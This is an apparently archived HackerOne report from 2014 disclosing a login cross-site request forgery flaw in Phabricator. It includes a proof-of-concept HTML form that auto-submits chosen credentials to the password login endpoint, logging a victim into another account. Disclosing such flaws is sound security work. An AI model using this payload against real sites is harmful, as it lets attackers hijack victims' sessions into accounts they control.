Phabricator: Log in a user to another account

2014-01-23T12:54:26
ID H1:774
Type hackerone
Reporter dawidczagan
Modified 2014-02-22T22:21:32

Description

It is possible to log in the user to another account (no CSRF token). POC (for demonstration purposes with Submit button; normally sent automatically):

<html> <body> <form action="http://DOMAIN-WITH-PHABRICATOR/auth/login/password:self/" method="POST"> <input type="hidden" name="__dialog__" value="1" /> <input type="hidden" name="username" value="user3" /> <input type="hidden" name="password" value="password3" /> <input type="submit" value="Submit request" /> </form> </body> </html>

The user needs to be logged out, when the aforementioned request is submitted. It is assumed that user3 with password3 exists.